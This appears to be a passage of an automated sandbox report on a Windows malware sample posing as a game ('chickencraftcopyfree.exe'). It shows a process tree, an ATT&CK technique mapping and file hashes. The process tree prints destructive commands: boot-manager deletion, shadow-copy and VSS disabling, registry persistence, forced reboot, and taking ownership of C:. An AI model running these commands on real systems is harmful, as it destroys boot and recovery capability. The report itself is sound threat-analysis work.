    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="816.5.201790158\42519437" -childID 4 -isForBrowser -prefsHandle 3348 -prefMapHandle 3364 -prefsLen 29456 -prefMapSize 233932 -jsInitHandle 896 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {22ca3f16-8bb0-4084-8904-8060d63b3fd1} 816 "\\.\pipe\gecko-crash-server-pipe.816" 3360 1e7f2f58 tab
    3⤵
    PID:1444
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="816.6.1147999755\978579717" -childID 5 -isForBrowser -prefsHandle 3468 -prefMapHandle 3472 -prefsLen 29456 -prefMapSize 233932 -jsInitHandle 896 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9c478ae3-4af4-429a-a562-eebf60fc8c8f} 816 "\\.\pipe\gecko-crash-server-pipe.816" 3456 1f759158 tab
    3⤵
    PID:2716
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="816.7.1105365400\508046921" -childID 6 -isForBrowser -prefsHandle 3644 -prefMapHandle 3648 -prefsLen 29456 -prefMapSize 233932 -jsInitHandle 896 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ef2ba4a7-e72b-496d-bc63-d944b588c9aa} 816 "\\.\pipe\gecko-crash-server-pipe.816" 3632 1f75ac58 tab
    3⤵
    PID:2820
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="816.8.109625138\1585115368" -childID 7 -isForBrowser -prefsHandle 4092 -prefMapHandle 4100 -prefsLen 29456 -prefMapSize 233932 -jsInitHandle 896 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {df3e168a-99b3-4492-b4a9-bf30ca4e8abf} 816 "\\.\pipe\gecko-crash-server-pipe.816" 4152 1c8f4558 tab
    3⤵
    PID:2972
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="816.9.2094769992\2113542666" -childID 8 -isForBrowser -prefsHandle 3620 -prefMapHandle 3596 -prefsLen 29456 -prefMapSize 233932 -jsInitHandle 896 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cdf262c6-b8ce-4bb4-a5e6-f54e94a208f7} 816 "\\.\pipe\gecko-crash-server-pipe.816" 3588 24465958 tab
    3⤵
    PID:1436
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="816.10.1825740545\1763363028" -childID 9 -isForBrowser -prefsHandle 3632 -prefMapHandle 3752 -prefsLen 29465 -prefMapSize 233932 -jsInitHandle 896 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {be10c52f-f6c5-47f7-a25f-b55a164fb9a6} 816 "\\.\pipe\gecko-crash-server-pipe.816" 3628 25308158 tab
    3⤵
    PID:4056
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="816.11.1511929160\590929587" -childID 10 -isForBrowser -prefsHandle 4140 -prefMapHandle 4144 -prefsLen 29465 -prefMapSize 233932 -jsInitHandle 896 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e8702f65-aea4-4a53-a76e-4d7df73aa344} 816 "\\.\pipe\gecko-crash-server-pipe.816" 4104 1ea4e858 tab
    3⤵
    PID:3776
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="816.12.1614556127\1080303272" -childID 11 -isForBrowser -prefsHandle 3564 -prefMapHandle 3584 -prefsLen 29465 -prefMapSize 233932 -jsInitHandle 896 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3df6e6f-ef1e-4a19-b877-5fd29b878763} 816 "\\.\pipe\gecko-crash-server-pipe.816" 4348 23cc0358 tab
    3⤵
    PID:3952
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="816.13.241755589\984740067" -childID 12 -isForBrowser -prefsHandle 4480 -prefMapHandle 3628 -prefsLen 29465 -prefMapSize 233932 -jsInitHandle 896 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6066a336-3293-46de-91aa-0b0b2b286cda} 816 "\\.\pipe\gecko-crash-server-pipe.816" 3852 11c17958 tab
    3⤵
    PID:3644
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="816.14.301409369\641234197" -childID 13 -isForBrowser -prefsHandle 4408 -prefMapHandle 4416 -prefsLen 29465 -prefMapSize 233932 -jsInitHandle 896 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3b3f779f-2bce-4999-be03-683d24aec1db} 816 "\\.\pipe\gecko-crash-server-pipe.816" 4612 11c3b858 tab
    3⤵
    PID:3720
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="816.15.1256731849\493170029" -childID 14 -isForBrowser -prefsHandle 3804 -prefMapHandle 3872 -prefsLen 29465 -prefMapSize 233932 -jsInitHandle 896 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bda37ce4-4b83-4101-98f3-e11c8d329fba} 816 "\\.\pipe\gecko-crash-server-pipe.816" 4424 1c8f7b58 tab
    3⤵
    PID:2332

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x47c
1⤵
PID:848

C:\Windows\system32\notepad.exe
"C:\Windows\system32\notepad.exe"
1⤵
- Suspicious use of FindShellTrayWindow
PID:2036

C:\Users\Admin\Desktop\chickencraftcopyfree.exe
"C:\Users\Admin\Desktop\chickencraftcopyfree.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3760
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DB80.tmp\DB81.tmp\DB82.bat C:\Users\Admin\Desktop\chickencraftcopyfree.exe"
  2⤵
  PID:3792
- - C:\Windows\system32\mode.com
    mode con:cols=50 lines=2
    3⤵
    PID:3128
- - C:\Windows\system32\reg.exe
    reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
    3⤵
    PID:3816
- - C:\Windows\system32\reg.exe
    reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
    3⤵
    PID:3848
- - C:\Windows\system32\msg.exe
    msg * Wyour computer hack?https://imgur.com/a/unSfBqO
    3⤵
    PID:3660
- - C:\Windows\system32\net.exe
    net session
    3⤵
    PID:3824
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      PID:2856
- - C:\Windows\system32\bcdedit.exe
    bcdedit /delete {bootmgr} /f
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:2080
- - C:\Windows\system32\shutdown.exe
    shutdown /r /f /t 2
    3⤵
    PID:3788
- - C:\Windows\system32\vssadmin.exe
    vssadmin Resize ShadowStorage /For=C: /On=C: /Max=Size=320MB
    3⤵
    - Interacts with shadow copies
    PID:2132
- - C:\Windows\system32\reg.exe
    REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer" /v
    3⤵
    PID:3956
- - C:\Windows\system32\sc.exe
    sc config vss start= disabled
    3⤵
    - Launches sc.exe
    PID:3976
- - C:\Windows\system32\net.exe
    net stop "vss"
    3⤵
    PID:4024
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vss"
      4⤵
      PID:4000
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore"
    3⤵
    PID:3996
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    PID:4020
- - C:\Windows\system32\takeown.exe
    TAKEOWN /F C:\ /R /D Y
    3⤵
    - Modifies file permissions
    PID:2268
- - C:\Windows\system32\takeown.exe
    TAKEOWN /F C:\Windows /R /D Y
    3⤵
    - Modifies file permissions
    PID:844

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:2020

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
1⤵
PID:3212

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Direct Volume Access

T1006

File and Directory Permissions Modification

T1222

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\24c691b3-54e3-44bc-8dfb-0977581a734e.tmp

Filesize
322KB

MD5
fa5f8b140a28bcbb8ee8255d4da48b4e

SHA1
5eae9fe57607b9ed25557e2394d67e4a17ac1ca9

SHA256
358131e285fadbd0658689f1aa06f1cd7b6f2ed8e89579fecb798c678ecaad26

SHA512
0d53b3de843d8ad8b2d5f3f9476dd9da92323a31c6a359f3b05441918df4ca5b4b7b8e21c6f9916dbd979ba4ea57cbf2f4fe889069ec50ce2277ac82e9867248

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

Filesize
212KB

MD5
2257803a7e34c3abd90ec6d41fd76a5a

SHA1
f7a32e6635d8513f74bd225f55d867ea56ae4803

SHA256
af23860fb3a448f2cc6107680078402555a345eb45bc5efb750f541fe5d7c174

SHA512
e9f4dc90d0829885f08879e868aa62041150b500f62682fc108da258eee26ad9509dcbf6e8a55f2d0bdba7aa9118dd149a70a7d851820d4ea683db7808c48540

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
363B

MD5
0cf19a7236e2b333d8bd2a80b24b5aa4

SHA1
b0dfa8101446e2f4c7c7a507700097aa620d7e54

SHA256
ff5c59b3e45d7c3445b36ffc73e17d08f6102066dd9bb77bce544b28f5b3bec0

SHA512
941e2b166a0f751b9bed22b7622c59c26afacdde6bd7e76e299cecf0f8081704af428f586695b599581d505cb5712a06db96653243feb86882ad7a75270e7d84

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
287dd894326d057d7229a99a0589dc67

SHA1
9e081f9c50c656b73fe56ec5764f1a79ca053243

SHA256
ad86a9bdab2a88b738ab2d8b0db77c3796b1aef7c55b96dff1b5cf1abf030280

SHA512
f77853b1cae4ecc5b5eeaace93667aa9da222b9103c1117736501f8310ded7842e404f65a276907766ba4513e84001faef438115ec0cb1b08f1e696c1ef88135

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences~RFf7a9675.TMP

Filesize
5KB

MD5
fc5b0083ba50d4284aae3cba74223207

SHA1
292303ef591662bfe8852a978e23f17b20eacfad

SHA256
acba08a195659bed5a895c49d8d3a170ab0db1e5a056d278580abdad02295b1a

SHA512
48bce249f5664695c28e45acde197b3367b697409be43590939f2cb91335ec28fc1fff8b1d203e2c410fb4a7c3e88b407ff73a3fd9e8c145ffeeb522a3c6e9fb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

Filesize
16B

MD5
18e723571b00fb1694a3bad6c78e4054

SHA1
afcc0ef32d46fe59e0483f9a3c891d3034d12f32

SHA256
8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

SHA512
43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
319KB

MD5
cb52a23e3f5438fa0d7d3fd04453bc86

SHA1
c9e9ce1da2fb25e9bb829a1cc917b2736cca67bc

SHA256
f5a4118b1ba442979e9aace8fd1a98592741bccbd949fad7f350ddc620b27ac0

SHA512
99d890567b7128fc8e55088ea3b5eadaefa07dbcc8e33424822edd0c3fa6988868b70840ece666ee370b5960a5f916907e30e8da293e12a7a798e9ae87cd9597

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
322KB

MD5
575c0d1e45ff4fcaaad88b9ae35d2339

SHA1
441589d45970abc37be630dc263d185695e3aa1d

SHA256
b16167da9ddb8740e952cd95eeb2d0aea461c958600fac80d82a8b6232c3ee05

SHA512
d26393ad1aaa846210e28ecbe6e7e4f3bad936ec527a4475ea8f2f90aed520e500b630989bbb1fdac020e1881d8a8803d44811380d8a6b641c847822fc562462

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uj06vnfd.default-release\activity-stream.discovery_stream.json.tmp

Filesize
46KB

MD5
bbb03f82526e8790c34465421aee9a64

SHA1
d0ca3215c9d8c2821428682cc42b9132a6aeaab7

SHA256
f71fe5026a62f29714dfdfa460b51b3690e91bde6fe79b693b978f3aee9df4af

SHA512
d4214808019ae03cb87c43b06113ec1810a61c071314fbfa3db80b932ceb9ef3d1745461ef2223d0a04bb1ef92bb3317a1d314bea68743eba9b7df015746d797

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uj06vnfd.default-release\cache2\entries\0AF01764B05F185076FBB08FE95401E13FE77782

Filesize
20KB

MD5
1e24877180e664eac3dbd58053d884f1

SHA1
fa1ee40cc66250425d3541e271a00b90023e2a80

SHA256
94bee37eca5fb66f573a537950d8765c8ea642bf1656a90635fb59643f8b8aa9

SHA512
dea58f779c1f718d5452ba82786c58b22abf63c7de83c8c7ff2474e4b19d00582411f7557101af0bf652202ec6780dae725d11bb246af65c2c7e36a732f4dc4e

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uj06vnfd.default-release\cache2\entries\29688408F06DEEA999CA8EF3E83EC1B33DB8AA9C

Filesize
17KB

MD5
873089ef09756f2b6bf5029e5bb57175

SHA1
d93a11e017d08a8d5814e6b6861b2059f6a1aa39

SHA256
0eaace992957bd8e040a38725742b84d4ee7dd88db65a3cfca2c291d8235c5e7

SHA512
a2da73dba991b1a37411112cf5a15e49085dc3b739f56efb9d4887af872649f94eedb4b450aa447cc8bc5e66f2f541a6e266aa6211068ea6a08241af8ca97478

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uj06vnfd.default-release\cache2\entries\2E191701CB84856982FBDEC29249CA4318631064

Filesize
27KB

MD5
9c66043eda78f9957c769ef0e793e144

SHA1
2701008b87b2a12a3193e1223487906bc5e57914

SHA256
564d763a20b36f27a2f9f10556174f76a84dbf15f738b55949773d018761b98f

SHA512
383dbb44ee960a0666bdafd27fd459aee9be9e3a3f83d29d30105e3b7699bc6340df05bb3f7d2409403ce38ee9bb144ccf0e362fafd5bbcd79acaf9fa7bcff2d

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uj06vnfd.default-release\cache2\entries\58EFA56DB4BFFECB0EDA547894BC9A057159E22F

Filesize
13KB

MD5
165581327558b644a2b289a54f766dbc

SHA1
957f1d60fb8280e98f7a1344e3f2abf2c07c2cc9

SHA256
50c4b39a22b5b00d8d006534f55872ff71c03f4d0c6634b28332201b6b0d4626

SHA512
ba89ef923f1a0018c24eb2246a8401c6039c1775bebc87a9dc9847387af62f4453735ad71ebd04810c5981ef8a5fce242ba7097678c8be64e7e9d6d277ec1899

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uj06vnfd.default-release\cache2\entries\5C6B72F603C94EB5FC99EFE30C4C317DECB883AC

Filesize
261KB

MD5
ee25d91c11e5f0806bb8c80a08920db3

SHA1
2a9333add1277311502c90d01d6a7bccfc74246c

SHA256
7434973d1895a1375056dc4e1ebd2fe57610d4562e94dc4b9ba5a2164fda0933

SHA512
b36f120eb5d81463c6249c675af34d23b3ca10bfd935a8b24af72663860f769c17af96295670440a5a7dee5746be99e0804a228215afcde9244cba2e01dc7b0d

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uj06vnfd.default-release\cache2\entries\635173200124313B1FF34FAE0FFBC6198EB7019D

Filesize
60KB

MD5
41bd1c7679ec4fb83f34ae66449f63e7

SHA1
4b976d46d30631d8a0f175fabcc844aaad3ad500

SHA256
c113b364a5aea498a7f4157137c064aea67897ed176afd2f1c12eb2951d7936a

SHA512
1ed9dbe42985c4ce661c136f21b71a63b53510dbe83d406937e0aa147d5847b66dcec55d61ab578203e52aecedc20cac67560e593830ab7eaa8d0e4691a95bf2

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uj06vnfd.default-release\cache2\entries\63C0D6B9C86AE74EAF24F01B8E6FF4100E2B6513

Filesize
290KB

MD5
48871d9aef11cba507945f2f6911b177

SHA1
2024bf8029ebeb87300ec93aa3a2192aed3cb4a1

SHA256
9baccd203dfc64e5ba799ca2c9cfed01e4f4bb6f3f8c55c912b92cc53614f07c

SHA512
a69d28613bf417d7b91b5920feeeb313de2f5a34813c407ec1440e723d4dae5dc1e0b0ad1cdeb056f90bdf0dbcece0c749fac8650e93e9a8a0b4b3dd30a77fbc

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uj06vnfd.default-release\cache2\entries\69D82641BCB6900BF92153659C0E7F78ADF9A581

Filesize
41KB

MD5
6b6652903d4f17b5fd2a56e9730674d1

SHA1
4fc685838dac6b3795c130aa839a57e5d16bc2b5

SHA256
1a94f48f342ee830b9e33dbf01df65d0cc32d844eb5bbedb0780d8c4bbdd9ce2

SHA512
7a89b7d580e57454c78561509052c1036d409c3ef5c34020583ebf311cb158b1db1cf358f4fab89becc0195dd5d4ead52505c80768a943a71c041222dc9772fb

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uj06vnfd.default-release\cache2\entries\6CE7596A5F6F9B95FBFA960E7C69F15EB4C75BFF

Filesize
18KB

MD5
e53685fd9423833edc0c0a941578f6a1

SHA1
de0b1e8d00c26fdd271d4ced5a31fd341ddb2dc4

SHA256
5e3ea62d858f2e3d796e65da0cbc982742bc5ddb39e030665edbb360606672f9

SHA512
344ad5ab1655570f1ef18a6bcb8221d081deb511e3d1bf624d3d199fa35b2fad498bc9164334295bfc0700217bc0e25021d4e31a924010c72bdacacb00a474eb

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uj06vnfd.default-release\cache2\entries\76683871B3580E407BFD7DF794F8A9B2A0317023

Filesize
17KB

MD5
d11e2f2bc55fdf198ab00665cfda156e

SHA1
6261528e7cb586c75cfc5c435023dc23693c218a

SHA256
2b8214b76b08ab40b65cac4f4015dd877af2a1e7c53e0ca322c1a71580a45ced

SHA512
bc952830b8238c57fd564163988ef58252aa24ea3bd17308eddcae010675123aa349d3bf032544e5098a4d6fec7064779fb9a32985472283e7b5c5072fd1e0b8

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uj06vnfd.default-release\cache2\entries\882527269F199653C0656BFB0E6F8A795C1FD48D

Filesize
14KB

MD5
2390fd3f28b10fc14b09c5763c15364e

SHA1
f9d3b2dffc550f45f3b69ebf13564bc4839fe83c

SHA256
f7802b6eea1e6f8a7ca2a20052d7235c09e4d3855a39dffe4221c64ca1159135

SHA512
09a8e6accbeef4764e2fab503108256f61f0ae7f91f17d9dc68ea2dbe1e087e60baec8ed9c70549c654af1930946210b1f32a2685fce667d47e292c8531d7329

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uj06vnfd.default-release\cache2\entries\90AE2E04396BC309610B440BC1F61D8B1AC4FEAC

Filesize
275KB

MD5
8f8f5100711a823bd66213e3edcdce27

SHA1
6179d2e12273032da92012a5bc3372788c790096

SHA256
6ae68a6a014fb4ab62af9b3ffdb333e5d530031992146086f9e928211d7a3e02

SHA512
8d565081ce7659384e6275e4282a77fd2837f7488563ab59c3e211f6e6ea3ff3576d3da3ac6dc27780647c45e349c8af2cf61995ee04128f93187ffacc18234b

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uj06vnfd.default-release\cache2\entries\AB7F395CA0E79B5B918770FAB8A7513886BA9032

Filesize
15KB

MD5
2379de52403574a18063453964c9aa62

SHA1
65f49eac0e82f366837619ad16d9600d523b50c2

SHA256
7fbec702f907b1003bd787fdc9c93e15cd9365dcdda3a5d2b91cb410a86aa2e0

SHA512
5b6ffbb460be8676dd92f680e137d8cc3afc22f27932881175242fb64a704147e40d45028c55df69f3efcae201b79899657ca6b1aa1dd418384fdc604ee740fd

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uj06vnfd.default-release\cache2\entries\ACBDD9F6105E81C99C7DE771E3750631625DE7C9

Filesize
842KB

MD5
584a18208d74cb5fdd816afc369f5997

SHA1
d3449d2161e71ccdd628f6396332e9eaa56cc968

SHA256
9f5f36d61a93cbb4081394ee411f0e284596d631928acdfd2a5d83d2fc1782f0

SHA512
9d35718425c47128cfae2ff70dbd4f691990e54d060c6c684da746b1f51fd563298e011bcf3568d755fa15b83ec094fedde839a5ca1a5945a722d02aef6d27af

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uj06vnfd.default-release\cache2\entries\B6E2C5FD739E98706144463623260147EEEBFE55

Filesize
55KB

MD5
65c3afba23f473daabc7c2e68f6fee50

SHA1
daa39d69b8f060b87509decf944afab69a86c334

SHA256
527eff2c19c3562270d0449103014b60028415efc9b7e9b97f6d42de0ffee1f7

SHA512
995d4a35de3e271a6659ef458aa62b1f7ace0004469a071660df1c6b37e03b60c09b5e98df2abb1848eb23d7420a4d88b6758da1cf27ed5d8f21182cea9ca239

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uj06vnfd.default-release\cache2\entries\C6A33B8BB98C3A166AB9A4C6B35E6F61B484EA75

Filesize
51KB

MD5
a4abb4d5595ef715c441a34002821e4f

SHA1
cda389388fd3c0f3a169f231965602762d7636d7

SHA256
2e34cf0b942d93d5d79fdbee0c98b6c71098d1557d30110ccc6a5ec3f525e69f

SHA512
9eb2b3ed0c39c5820639e470486da59cbf9dd58a4589978f0c51486e7817f14fc5264bb2914373ffc4f43ace896fa95e7b2e42307fa7c6d6b9afe5a95e9d0569

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uj06vnfd.default-release\cache2\entries\CC781311EDB0FA207C7EA7AF0C720872F6DBEB95

Filesize
12KB

MD5
3c7c955fe61dbc007078dc2e42bdab5b

SHA1
fe00b25ba44c8f13b13137ba519d31a88d194609

SHA256
46ba5d6ee3d20c18ee4ada41387238b1131ae3f14a6270370491a4eb08e55489

SHA512
1e622f1568fac515ff3aeb6ddfadd7f175ebcf9f8af5d27a6137f6781737c2f69673845117242501e98346cf3c5f6e8d471857c127a507e5f48b5fab054aedbd

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uj06vnfd.default-release\cache2\entries\D637D34D6EA536A7D0CFD21F8ED72724DEDC54B7

Filesize
26KB

MD5
277e766249104b5ef58f47458de42ed3

SHA1
058cc402cc3e19d9a06eb5a308a9ccf931454a5d

SHA256
fdf6efd860e9738d8263ad754beb5b05fcd76fdbd685f6331e917b65a518df9c

SHA512
60c5e705bf303b5631691ca14d77f5588dbf339fa945049984e0e6e041697c1ca8dd2e86d052278c79c57ed00837f13eb1b24e29b206c091a55e5aa037f313ac

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uj06vnfd.default-release\cache2\entries\F3A5233AFBA336F13EEC8117268D43A707F61D4E

Filesize
51KB

MD5
e66dccca230a1270ac84f3a729c58535

SHA1
cb4cac6ff5a0d956471f870555b28123127aeccb

SHA256
fa168a7da98734fe8d8d647bc8716b7749fe5bf9e7c3a47b5c5ad9fb4636695a

SHA512
26535b1e0c3e61d1f152a06b8010bc83ac80ec5646ff5cf7633c05289254b32d280a11351e3b14104d90f0d533151d0af1ef8bf87c276b2a398b1d27e3a6b36b

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uj06vnfd.default-release\cache2\entries\F8CBD54DDA10F4286A41EC6A537240712D6C2308

Filesize
9KB

MD5
b06c2d2e217dd1fde136cd1a8a92469a

SHA1
e852457f3b54379107603d303580696b21402fee

SHA256
5fb97d31ca58a0a14b0c8a45b04f4306179719e112ac178f08ab36bfa056f75d

SHA512
c02e0293ae3363020448c012fc7e12f9c085cdb4d6d5dd12a84e23230c774bce54bad0fbcf73c18cd388f1c9a534e50698d2968982bc5ed4d6057282e0bf3538

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uj06vnfd.default-release\cache2\index

Filesize
71KB

MD5
ffe4a5508e0239f0d034f16cd5fdb1b9

SHA1
f9d4575b410afab60e40b7766c485c78558ae683

SHA256
2df5942e015598837d43063c3d7eef05565ce655af677f94f4e8cc5c389887b1

SHA512
6a796581ecdf87b2e62a135222740da066ea7764afa4f54c099f56b3268075beb1d6c917562e8ad8f56acd8a719e9241304159a6b467f549825a35c8a046272b

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uj06vnfd.default-release\cache2\index.log

Filesize
127B

MD5
33cb3f43266fb451a570a1a2d093b044

SHA1
71e32f99e9748b2c0038f3eb6fc7c1be7e50b2b5

SHA256
497df2d14490a159a6fc1f858f0510074096e36002e9b5196e5ad3018f237501

SHA512
855b2ea7a9dfe562de3e1ac02b8826c5234ffb5a793dc92df0b2604b8cbab2f0cf08ee9f64b45b19ea2b1c2d9672c0bf6cf632cd48da6dcf396b69b2edfa63bb

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uj06vnfd.default-release\startupCache\scriptCache-child.bin

Filesize
458KB

MD5
ba124be5761a8fbe221625fec2d7ee84

SHA1
f8617b00ee3c0d312c28852369da1878d564ad73

SHA256
2f4592abf022de009ea331c95b31ef760e78efa67b20c7d66b054e8914d027dd

SHA512
53ce61703079932f08d881d51daa75f46a808b1ce64c1c0c85d56b6af2e6922294ffb7245ffa6375b8106ffd6e9750612f1ce53b97d955e792a707a2c277cbeb

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uj06vnfd.default-release\startupCache\scriptCache.bin

Filesize
7.9MB

MD5
d982fa2150d6100589e125af5d7fafb4

SHA1
a3402ce25067051ab2bf4566f2124a7278f6dc81

SHA256
96ac88b6db1791d5a2ad0c14078be2d2f4cd93a699b66d0f8d8ce42463849455

SHA512
ad9ef8ad0d8ba7aa6eda165af026a8afb1ba319b84407308c35f28bfd84f967da5689091cd7e6ea91f3efd7d87a50de5623e91c85a3eef103782f2b4bd2ab9ea

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\uj06vnfd.default-release\startupCache\urlCache.bin

Filesize
2KB

MD5
49e5c6b141021301d477321b87b1b29b

SHA1
ed08c0463cb6c616e217f54e55454169c78783fe

SHA256
da956a8701fd10bdec4dbb9893ae07d352704d1cc889894e838681ec57dff2eb

SHA512
b3f9b676da536c309d0e220651028b7313ba4694d0f7f69a39d388206547af77c97d5f3609b82dc1175beb90ff32a75d26c9d6b92950ca10f349ba45693b52c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
442KB

MD5
85430baed3398695717b0263807cf97c

SHA1
fffbee923cea216f50fce5d54219a188a5100f41

SHA256
a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e

SHA512
